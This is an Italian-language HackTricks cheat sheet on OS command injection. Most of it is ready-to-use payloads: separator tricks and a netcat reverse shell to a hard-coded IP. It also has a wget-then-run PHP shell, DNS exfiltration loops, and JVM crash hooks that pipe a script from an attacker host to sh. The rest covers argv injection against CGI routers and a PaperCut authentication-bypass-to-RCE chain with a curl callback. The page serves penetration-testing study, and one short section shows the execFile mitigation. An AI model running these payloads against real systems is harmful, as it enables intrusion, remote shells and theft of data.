Command Injection

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

Che cos’è command Injection?

Una command injection permette l’esecuzione di comandi arbitrari del sistema operativo da parte di un attacker sul server che ospita un’applicazione. Di conseguenza, l’applicazione e tutti i suoi dati possono essere completamente compromessi. L’esecuzione di questi comandi tipicamente consente all’attacker di ottenere accesso non autorizzato o controllo sull’ambiente dell’applicazione e sul sistema sottostante.

Contesto

A seconda di dove il tuo input viene iniettato potresti dover terminare il contesto tra virgolette (usando " o ') prima dei comandi.

Command Injection/Execution

#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id #  Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)
ls%0abash%09-c%09"id"%0a   # (Combining new lines and tabs)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command

Limition Bypasses

Se stai cercando di eseguire comandi arbitrari all’interno di una macchina linux ti potrebbe interessare leggere questi Bypasses:

Bypass Linux Restrictions

Esempi

vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay

Parametri

Ecco i primi 25 parametri che potrebbero essere vulnerabili a code injection e a simili vulnerabilità RCE (da link):

?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

Time based data exfiltration

Estrazione dei dati: carattere per carattere

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s

Esfiltrazione di dati basata su DNS

Basato sullo strumento disponibile su https://github.com/HoLyVieR/dnsbin, ospitato anche su dnsbin.zhack.ca

1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done

$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)

Strumenti online per verificare DNS based data exfiltration:

  • dnsbin.zhack.ca
  • pingb.in

Filtering bypass

Windows

powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc

Linux

Bypass Linux Restrictions

Node.js child_process.exec vs execFile

Durante l’audit di back-end JavaScript/TypeScript incontrerai spesso l’API Node.js child_process.

// Vulnerable: user-controlled variables interpolated inside a template string
const { exec } = require('child_process');
exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(payload)}'`, (err, stdout) => {
/* … */
});

exec() avvia una shell (/bin/sh -c), quindi qualsiasi carattere che ha un significato speciale per la shell (back-ticks, ;, &&, |, $(), …) causerà command injection quando l’input dell’utente viene concatenato nella stringa.

Mitigazione: usa execFile() (o spawn() senza l’opzione shell) e fornisci ogni argomento come elemento separato dell’array in modo che la shell non sia coinvolta:

const { execFile } = require('child_process');
execFile('/usr/bin/do-something', [
'--id_user', id_user,
'--payload', JSON.stringify(payload)
]);

Caso reale: Synology Photos ≤ 1.7.0-0794 era sfruttabile tramite un evento WebSocket non autenticato che inseriva dati controllati dall’attaccante in id_user, successivamente incorporati in una chiamata exec(), ottenendo RCE (Pwn2Own Ireland 2024).

Iniezione di argomenti/opzioni tramite trattino iniziale (argv, senza metacaratteri di shell)

Non tutte le injection richiedono metacaratteri di shell. Se l’applicazione passa stringhe non fidate come argomenti a un’utility di sistema (anche con execve/execFile e senza shell), molti programmi comunque interpreteranno qualsiasi argomento che inizi con - o -- come un’opzione. Questo permette a un attaccante di cambiare modalità, modificare percorsi di output o attivare comportamenti pericolosi senza mai entrare in una shell.

Luoghi tipici in cui questo si verifica:

  • Interfacce web embedded/handler CGI che costruiscono comandi come ping <user>, tcpdump -i <iface> -w <file>, curl <url>, etc.
  • Router CGI centralizzati (es. /cgi-bin/<something>.cgi con un parametro selettore come topicurl=<handler>) dove più handler riutilizzano lo stesso validatore debole.

Cosa provare:

  • Fornire valori che iniziano con -/-- affinché vengano interpretati come flag dallo strumento a valle.
  • Abusare di flag che cambiano il comportamento o scrivono file, per esempio:
  • ping: -f/-c 100000 per stressare il dispositivo (DoS)
  • curl: -o /tmp/x per scrivere percorsi arbitrari, -K <url> per caricare una config controllata dall’attaccante
  • tcpdump: -G 1 -W 1 -z /path/script.sh per ottenere l’esecuzione post-rotate in wrapper non sicuri
  • Se il programma supporta -- (segnale di fine opzioni), provare a bypassare mitigazioni ingenue che antepongono -- nel punto sbagliato.

Forme generiche di PoC contro dispatcher CGI centralizzati:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded

# Flip options in a downstream tool via argv injection
topicurl=<handler>&param=-n

# Unauthenticated RCE when a handler concatenates into a shell
topicurl=setEasyMeshAgentCfg&agentName=;id;

Callback diagnostici JVM per exec garantita

Qualsiasi primitiva che consente di iniettare argomenti della riga di comando della JVM (_JAVA_OPTIONS, file di configurazione del launcher, campi AdditionalJavaArguments negli agenti desktop, etc.) può essere trasformata in una RCE affidabile senza modificare il bytecode dell’applicazione:

  1. Forza un crash deterministico riducendo metaspace o heap: -XX:MaxMetaspaceSize=16m (o un piccolo -Xmx). Questo garantisce un OutOfMemoryError anche durante il bootstrap iniziale.
  2. Allega un hook di errore: -XX:OnOutOfMemoryError="<cmd>" o -XX:OnError="<cmd>" esegue un comando OS arbitrario ogni volta che la JVM abortisce.
  3. Facoltativamente aggiungi -XX:+CrashOnOutOfMemoryError per evitare tentativi di ripristino e mantenere il payload one-shot.

Esempi di payloads:

-XX:MaxMetaspaceSize=16m -XX:OnOutOfMemoryError="cmd.exe /c powershell -nop -w hidden -EncodedCommand <blob>"
-XX:MaxMetaspaceSize=12m -XX:OnOutOfMemoryError="/bin/sh -c 'curl -fsS https://attacker/p.sh | sh'"

Poiché queste diagnostiche vengono analizzate dallo stesso JVM, non sono richiesti shell metacharacters e il comando viene eseguito con lo stesso livello di integrità del launcher. I bug Desktop IPC che inoltrano JVM flags fornite dall’utente (vedi Localhost WebSocket abuse) si traducono quindi direttamente in OS command execution.

PaperCut NG/MF SetupCompleted auth bypass -> print scripting RCE

  • Vulnerable NG/MF builds (e.g., 22.0.5 Build 63914) espongono /app?service=page/SetupCompleted; visitando quella pagina e cliccando Login viene restituito un JSESSIONID valido senza credenziali (authentication bypass nel flusso di setup).
  • In Options → Config Editor, impostare print-and-device.script.enabled=Y e print.script.sandboxed=N per attivare lo scripting della stampante e disabilitare il sandbox.
  • Nella scheda Scripting della stampante, abilita lo script e lascia printJobHook definito per evitare errori di validazione, ma posiziona il payload outside della funzione in modo che venga eseguito immediatamente quando clicchi Apply (non è necessario alcun print job):
function printJobHook(inputs, actions) {}
cmd = ["bash","-c","curl http://attacker/hit"];
java.lang.Runtime.getRuntime().exec(cmd);
  • Sostituisci il callback con una reverse shell; se la UI/PoC non può gestire pipes/redirects, stage un payload con un comando ed eseguilo con una seconda richiesta.
  • Lo CVE-2023-27350.py di Horizon3 automatizza l’auth bypass, i config flips, la command execution e il rollback—eseguilo tramite un upstream proxy (es., proxychains → Squid) quando il servizio è raggiungibile solo internamente.

Lista di rilevamento Brute-Force

Auto_Wordlists/wordlists/command_injection.txt at main \xc2\xb7 carlospolop/Auto_Wordlists \xc2\xb7 GitHub

Riferimenti

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks